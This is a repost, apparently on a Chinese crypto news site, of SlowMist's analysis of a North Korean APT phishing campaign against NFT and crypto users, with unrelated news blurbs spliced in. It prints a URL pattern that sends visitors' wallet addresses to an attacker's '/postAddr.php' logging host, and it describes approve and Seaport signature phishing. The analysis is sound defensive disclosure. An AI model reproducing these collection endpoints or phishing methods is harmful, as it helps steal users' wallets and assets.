以太幣交易所 以太幣交易所
Ctrl+D 以太幣交易所
ads

慢霧:朝鮮APT組織對NFT用戶大規模釣魚事件分析_NBS

Author:

Time:1900/1/1 0:00:00

9 月 4 日,推特用戶 Phantom X 發推稱朝鮮 APT 組織針對數十個 ETH 和 SOL 項目進行大規模的網絡釣魚活動。

(https://twitter.com/PhantomXSec/status/1566219671057371136 )

該推特用戶給出了 196 個釣魚域名信息,分析后關聯到朝鮮黑客相關信息,具體的域名列表如下:

(https://pastebin.com/UV 9 pJN 2 M)

慢霧安全團隊注意到該事件并第一時間跟進深入分析:

(https://twitter.com/IM_ 23 pds/status/1566258373284093952 )

由于朝鮮黑客針對加密貨幣行業的攻擊模型多樣化,我們披露的也只是冰山一角,因為一些保密的要求,本篇文章也僅針對其中一部分釣魚素材包括相關釣魚錢包地址進行分析。這里將重點針對 NFT 釣魚進行分析。

慢霧:7月3日至7月7日期間?Web3生態因安全問題損失近1.3億美元:7月10日消息,慢霧發推稱,自7月3日至7月7日,Web3生態因安全問題遭遇攻擊損失128,419,000美元,包括Encryption AI、AzukiDao、NFT Trader、MIKE&SID、Bryan Pellegrino、Aptos Foundation、Multichain、CivFund。其中,Multichain被攻擊損失1.26億美元。[2023/7/10 10:12:36]

經過深入分析,發現此次釣魚的其中一種方式是發布虛假 NFT 相關的、帶有惡意 Mint 的誘餌網站,這些 NFT 在 OpenSea、X2Y2 和 Rarible 等平臺上都有出售。此次 APT 組織針對 Crypto 和 NFT 用戶的釣魚涉及將近 500 多個域名。

查詢這些域名的注冊相關信息,發現注冊日期最早可追溯到 7 個月前:

同時我們也發現朝鮮黑客常使用的一些獨有的釣魚特征:

特征一:釣魚網站都會記錄訪客數據并保存到外部站點。黑客通過 HTTP GET 請求將站點訪問者信息記錄到外部域,發送請求的域名雖不同但是請求的 API  接口都為 “/postAddr.php”。一般格式為 “https://nserva.live/postAddr.php? mmAddr=...[Metamask]...&accessTime=xxx&url=evil.site”,其中參數 mmAddr 記錄訪客的錢包地址,accessTime 記錄訪客的訪問時間,url 記錄訪客當前所訪問的釣魚網站鏈接。

慢霧:近期出現新的流行惡意盜幣軟件Mystic Stealer,可針對40款瀏覽器、70款瀏覽器擴展進行攻擊:6月20日消息,慢霧首席信息安全官@IM_23pds在社交媒體上發文表示,近期已出現新的加密貨幣盜竊軟件Mystic Stealer,該軟件可針對40款瀏覽器、70款瀏覽器擴展、加密貨幣錢包進行攻擊,如MetaMask、Coinbase Wallet、Binance、Rabby Wallet、OKX Wallet、OneKey等知名錢包,是目前最流行的惡意軟件,請用戶注意風險。[2023/6/20 21:49:05]

特征二:釣魚網站會請求一個 NFT 項目價目表,通常 HTTP 的請求路徑為 “getPriceData.php”:

特征三:存在一個鏈接圖像到目標項目的文件 “imgSrc.js”,包含目標站點列表和在其相應網絡釣魚站點上使用的圖像文件的托管位置,這個文件可能是釣魚網站模板的一部分。

進一步分析發現 APT 用于監控用戶請求的主要域名為 “thedoodles.site”,此域名在 APT 活動早期主要用來記錄用戶數據:

慢霧:Gate官方Twitter賬戶被盜用,謹慎互動:10月22日消息,安全團隊慢霧發文稱:加密平臺Gate官方Twitter賬戶被盜用,謹慎互動。半小時前,攻擊者利用該賬戶發文,誘導用戶進入虛假網站連接錢包。此外,慢霧科技創始人余弦在社交媒體上發文表示:注意下,Gate官方推特應該是被黑了,發送了釣魚信息,這個網址 g?te[.]com 是假的(之前談過的 Punycode 字符有關的釣魚域名),如果你去Claim會出現eth_sign這種簽名釣魚,可能導致ETH等相關資產被盜。[2022/10/22 16:35:14]

查詢該域名的 HTTPS 證書啟用時間是在 7 個月之前,黑客組織已經開始實施對 NFT 用戶對攻擊。

最后來看下黑客到底運行和部署了多少個釣魚站點:

比如最新的站點偽裝成世界杯主題:

繼續根據相關的 HTTPS 證書搜索得到相關的網站主機信息:

慢霧:Badger DAO黑客已通過renBTC將約1125 BTC跨鏈轉移到10 個BTC地址:12月2日消息,Badger DAO遭遇黑客攻擊,用戶資產在未經授權的情況下被轉移。據慢霧MistTrack分析,截止目前黑客已將獲利的加密貨幣換成 renBTC,并通過renBTC 將約 1125 BTC 跨鏈轉移到 10 個 BTC 地址。慢霧 MistTrack 將持續監控被盜資金的轉移。[2021/12/2 12:46:11]

在一些主機地址中發現了黑客使用的各種攻擊腳本和統計受害者信息的 txt 文件。

這些文件記錄了受害者訪問記錄、授權情況、使用插件錢包的情況:

可以發現這些信息跟釣魚站點采集的訪客數據相吻合。

其中還包括受害者 approve 記錄:

以及簽名數據 sigData 等,由于比較敏感此處不進行展示。

另外,統計發現主機相同 IP 下 NFT 釣魚站群,單獨一個 IP 下就有 372 個 NFT 釣魚站點:

動態 | 慢霧:巨鯨被盜2.6億元資產,或因Blockchain.info安全體系存在缺陷:針對加密巨鯨賬戶(zhoujianfu)被盜價值2.6億元的BTC和BCH,慢霧安全團隊目前得到的推測如下:該大戶私鑰自己可以控制,他在Reddit上發了BTC簽名,已驗證是對的,且猜測是使用了一款很知名的去中心化錢包服務,而且這種去中心化錢包居然還需要SIM卡認證,也就是說有用戶系統,可以開啟基于SIM卡的短信雙因素認證,猜測可能是Blockchain.info,因為它吻合這些特征,且歷史上慢霧安全團隊就收到幾起Blockchain.info用戶被盜幣的威脅情報,Blockchain.info的安全體系做得并不足夠好。目前慢霧正在積極跟進更多細節,包括與該大戶直接聯系以及盡力提供可能需求的幫助。[2020/2/22]

另一個 IP 下也有 320 個 NFT 釣魚站群:

甚至包括朝鮮黑客在經營的一個 DeFi 平臺:

由于篇幅有限,此處不再贅述。

結合之前文章,我們對此次釣魚事件的核心代碼進行了分析。我們發現黑客釣魚涉及到 WETH、USDC、DAI、UNI 等多個地址協議。

下面代碼用于誘導受害者進行授權 NFT、ERC 20 等較常見的釣魚 Approve 操作:

除此之外,黑客還會誘導受害者進行 Seaport、Permit 等簽名。

下面是這種簽名的正常樣例,只是在釣魚網站中不是 “opensea.io” 這個域名。

我們在黑客留下的主機也發現了這些留存的簽名數據和 “Seaport” 的簽名數據特征一致。

由于這類型的簽名請求數據可以“離線存儲”,黑客在拿到大量的受害者簽名數據后批量化的上鏈轉移資產。

對釣魚網站及手法分析后,我們選取其中一個釣魚地址(0xC0fd...e0ca)進行分析。

可以看到這個地址已被 MistTrack 標記為高風險釣魚地址,交易數也還挺多。釣魚者共收到 1055 個 NFT,售出后獲利近 300 ETH。

往上溯源,該地址的初始資金來源于地址(0 x 2 e 0 a...DA 82 )轉入的 4.97 ETH。往下溯源,則發現該地址有與其他被 MistTrack 標記為風險的地址有交互,以及有 5.7 ETH 轉入了 FixedFloat。

再來分析下初始資金來源地址(0 x 2 e 0 a...DA 82 ),目前收到約 6.5 ETH。初始資金來源于 Binance 轉入的 1.433 ETH。

同時,該地址也是與多個風險地址進行交互。

由于保密性和隱私性,本文僅針對其中一部分 NFT 釣魚素材進行分析,并提煉出朝鮮黑客的部分釣魚特征,當然,這只是冰山一角。慢霧在此建議,用戶需加強對安全知識的了解,進一步強化甄別網絡釣魚攻擊的能力等,避免遭遇此類攻擊。

Ps. 感謝 hip、ScamSniffer 提供的支持。

相關鏈接:

https://www.prevailion.com/what-wicked-webs-we-unweave

https://twitter.com/PhantomXSec/status/1566219671057371136 

https://twitter.com/evilcos/status/1603969894965317632 

慢霧科技

個人專欄

閱讀更多

金色財經 子木

金色早8點

去中心化金融社區

虎嗅科技

區塊律動BlockBeats

CertiK中文社區

深潮TechFlow

念青

Odaily星球日報

騰訊研究院

Tags:NBSBSPNFTHTTnbs幣官網BSPT幣BeatGen NFThtt幣被騙

歐易okex官網
區塊鏈寒冬 誰在考慮大肆擴張_區塊鏈

作者:Chenglin Pua區塊鏈在2020和2021年受到極大關注,然而在2022年則進入“冬天”。元宇宙在2022年快速降溫, 11月,全球最大加密貨幣交易平臺之一FTX宣告破產.

1900/1/1 0:00:00
SBF的2.5億美元保釋金誰來支付_SBF

到目前為止,SBF尚未支付任何保釋費用,但只要違反擔保限制條件,他父母將會被拉下水。12月23日,紐約法官Gabriel W. Gorenstein批準FTX創始人SBF以2.5億美元保釋并通知.

1900/1/1 0:00:00
金色觀察 | Coinbase Vntures:Web3社交堆棧指南_TER

文/Angie Wang,Connor Dempsey, Coinbase Ventures;譯/金色財經xiaozouWeb3社交網絡賦予用戶對其數據、身份和關系的所有權及可移植性.

1900/1/1 0:00:00
DeFi 2022年度回顧:TVL整體下降76.1% 四大穩定幣流通量下降7%_TVL

回顧區塊鏈近些年來的發展,盡管MEME幣、NFT、GameFi等概念在不同時期都受到過追捧,但迄今為止,DeFi仍然是區塊鏈最主要的用例.

1900/1/1 0:00:00
FTX新任CEO國會證詞總結:八大過失、五大目標和五大困難_FTX

原文:《FTX新任CEO國會證詞要點提煉》 作者:Azuma 美國當地時間 12 月 13 日,美國眾議院金融服務委員將召開關于 FTX 事件的聽證會.

1900/1/1 0:00:00
盤點2022年改變加密歷史進程的十大事件_TOK

原文來源:The Block 原文編譯:DeFi 之道2022 年是定義加密貨幣的一年,盡管形勢不是很好。一切 貪婪和繁榮只是為了以壯觀的方式瓦解.

1900/1/1 0:00:00
ads